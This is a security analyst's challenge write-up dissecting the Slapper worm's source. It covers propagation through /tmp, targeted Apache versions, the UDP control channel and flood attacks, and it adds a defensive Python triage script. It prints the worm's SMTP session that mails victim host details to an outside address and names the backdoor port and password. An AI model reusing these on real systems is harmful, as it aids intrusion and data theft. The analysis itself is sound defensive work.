This scan of the month challenge requires source code analysis of a worm captured by Honeynet BR. As this challenge requires only source analysis, I used Cygwin running under Windows, rather than a complete GNU/Linux distribution.
After downloading the .unlock file, I checked the two checksums provided:

```
$ md5sum .unlock
a03b5be9264651ab30f2223592befb42 *.unlock
$ sha1sum .unlock
4b018cdfdbcf71ddaa789e8ecc9ed7700660021a *.unlock
```
They both matched.
I refer to line numbers a lot in this document. To help the casual reader, I generated two files, unlock_nl.c and update_nl.c, line-numbered versions of .unlock.c and .update.c respectively, using the GNU nl command:

```
$ nl -ba .unlock.c > unlock_nl.c
$ nl -ba .update.c > update_nl.c
```
A first use of the file command showed that .unlock was a gzip file, last modified on September 20 2002:

```
$ file .unlock
.unlock: gzip compressed data, deflated, last modified: Fri Sep 20 11:59:04 2002, os: Unix
```
Unzipping it and using file again showed that the uncompressed file was a GNU tar archive:

```
$ gzip -dc unlock.gz > unlock
$ file unlock
unlock: GNU tar archive
```
A quick check with tar prior to extraction revealed two files, dated at a similar time to the archive (although .unlock.c appears to have been created after the gzip file, for some reason). These were then extracted.

```
$ tar tvf unlock
-rw-r--r-- root/wheel    70981 2002-09-20 14:28:11 .unlock.c
-rw-r--r-- root/wheel     2792 2002-09-19 22:57:48 .update.c
$ tar xf unlock
```
The comments at the head of .unlock.c show that the worm was mostly written by contem@efnet, with modifications by aion@ukr.net, who also appears to have written .update.c.
The worm appears to have been created at 14:28 on 20 September 2002. This is not consistent with the last-modification date of the gzip file, which was apparently created earlier, at 11:59. For some reason, the time stamp of one or both of the files must have been altered at some point.
The worm uses httpd as its process name (line numbers from unlock_nl.c):

```
78    #define PSNAME "httpd "
1805  strcpy(argv[0],PSNAME);
```
The following answer is deduced from lines 1416-1428.
The worm copies itself as /tmp/.unlock.uu, created in uuencoded format from /tmp/unlock. Once copied, the file is decoded, as /tmp/.unlock. The /tmp/.unlock is then extracted using tar -xzf, to create the .unlock.c and .update.c files. These are compiled into http and update respectively, and both are started. All of these files are then removed, with the exception of /tmp/.unlock, which will be used for the next propagation.
Scans are performed on port 80 (SCANPORT) in lines 1908-1937, looking for a listening port. If the port is listening, the exploit function is called. This checks whether an Apache server is found on port 80 and whether the Apache version and operating system match one of those in the list below; if so, the Apache SSL exploit is performed.
Exploits Apache SSL vulnerability (see references), on the following (taken from the architectures struct in lines 1241-1269):
OS | Apache versions |
---|---|
Gentoo | |
Debian | 1.3.26 |
Red-Hat | 1.3.6, 1.3.9, 1.3.12, 1.3.19, 1.3.20, 1.3.22, 1.3.23, 1.3.26 |
SuSE | 1.3.12, 1.3.17, 1.3.19, 1.3.20, 1.3.23 |
Mandrake | 1.3.14, 1.3.19, 1.3.20, 1.3.23 |
Slackware | 1.3.26 |
The mailme function (lines 94-130 of .update.c) creates a sendmail session with freemail.ukr.net containing the following:

```
helo test
mail from: test@microsoft.com
rcpt to: aion@ukr.net
data
hostid: <host ip>
hostname: <hostname>
att_from: <controller machine>
```

Translated, this sends an email to aion@ukr.net, purportedly from test@microsoft.com, giving the IP address and hostname of the computer, as well as the machine with which it is communicating (the first argument, argv[1], given to the executable).
The worm communicates on port 4156 (PORT) over UDP - this can be seen in the calls to audp_listen, audp_send, audp_relay, audp_recv, audp_setup and audp_close functions from main, combined with an examination of those functions (just to check they actually do what their names suggest).
A brief summary of the audp_* functions is given below:

Function | Description | Line numbers |
---|---|---|
audp_listen | Creates a UDP socket inst listening on port | 589-613 |
audp_setup | Creates a UDP socket inst connected to host on port | 615-641 |
audp_send | Sends buffer buf of length len through socket inst | 662-681 |
audp_recv | Receives buffer into buf of length len from client through socket inst | 693-712 |
audp_relay | Clones parent socket, connects to host on port | 643-660 |
audp_close | Closes socket inst | 714-724 |
The three attack methods are TCP flood (lines 2246-2277), TCP flood over IPv6 (2279-2306) and DNS flood (2308-2385). Also included is a UDP flood (2205-2245).
.update.c compiles to an executable that runs as update and listens on port 1052 for a connection. If a connection is made, it checks the password against aion1981, and if the password matches, provides a shell.
UPTIME is used in the for loop so that the program listens for 10 seconds at a time, before sleeping for SLEEPTIME (5 minutes).
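The host indicators collected above (the "httpd " process name with its trailing space, the staging files in /tmp, the UDP port 4156 peer channel and the TCP port 1052 backdoor) can be turned into a simple triage check. The following is an added example written for this write-up, not code from the challenge or from the worm; it takes /proc/net and /proc/<pid>/cmdline contents as text so it can be run offline against the constructed samples at the bottom.

```python
"""Host triage helpers for the indicators in this write-up (added example; not
from the challenge or the worm source). Inputs are passed in as text so the
checks run offline against constructed samples."""

PSNAME = "httpd "            # argv[0] set by the worm, note the trailing space
TMP_ARTIFACTS = {".unlock", ".unlock.uu", ".unlock.c", ".update.c"}
UDP_CONTROL_PORT = 4156      # PORT: the worm's UDP peer-to-peer channel
TCP_BACKDOOR_PORT = 1052     # .update backdoor, password-protected shell

def listening_ports(proc_net_text):
    """Return local ports in listening state from /proc/net/udp or /proc/net/tcp
    text: st 07 is an unconnected (bound) UDP socket, 0A is TCP LISTEN."""
    ports = set()
    for line in proc_net_text.splitlines()[1:]:       # first row is the header
        fields = line.split()
        if len(fields) > 3 and fields[3] in ("07", "0A"):
            ports.add(int(fields[1].rsplit(":", 1)[1], 16))
    return ports

def fake_httpd_cmdline(cmdline):
    """True when argv[0] from /proc/<pid>/cmdline (NUL separated) equals the
    worm's PSNAME; a real Apache argv[0] never ends in a space."""
    return cmdline.split(b"\0", 1)[0].decode(errors="replace") == PSNAME

def triage(tmp_listing, udp_text, tcp_text, cmdlines):
    """Combine the checks into a list of findings; an empty list means no match."""
    findings = []
    hits = TMP_ARTIFACTS.intersection(tmp_listing)
    if hits:
        findings.append("staging files in /tmp: " + ", ".join(sorted(hits)))
    if UDP_CONTROL_PORT in listening_ports(udp_text):
        findings.append("UDP %d bound (worm peer-to-peer port)" % UDP_CONTROL_PORT)
    if TCP_BACKDOOR_PORT in listening_ports(tcp_text):
        findings.append("TCP %d listening (.update backdoor)" % TCP_BACKDOOR_PORT)
    for pid, cmd in sorted(cmdlines.items()):
        if fake_httpd_cmdline(cmd):
            findings.append("pid %d has argv[0] 'httpd ' (trailing space)" % pid)
    return findings

# Constructed /proc/net excerpts and cmdlines (sample data, not captured from a host).
SAMPLE_UDP = ("  sl  local_address rem_address   st tx_queue rx_queue ...\n"
              "   0: 00000000:103C 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 1234 2\n")
SAMPLE_TCP = ("  sl  local_address rem_address   st tx_queue rx_queue ...\n"
              "   0: 00000000:041C 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1235 1\n"
              "   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1236 1\n")
SAMPLE_CMDLINES = {2001: b"httpd \0", 2002: b"/usr/sbin/httpd\0-DSSL\0"}
```

Running triage([".unlock", "x.log"], SAMPLE_UDP, SAMPLE_TCP, SAMPLE_CMDLINES) on the samples reports all four indicators; the genuine Apache process (pid 2002) is not flagged because its argv[0] has no trailing space.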
While researching the Apache SSL vulnerabilities, it became clear that this worm was the linux.slapper worm. Two of the many references I found are available at: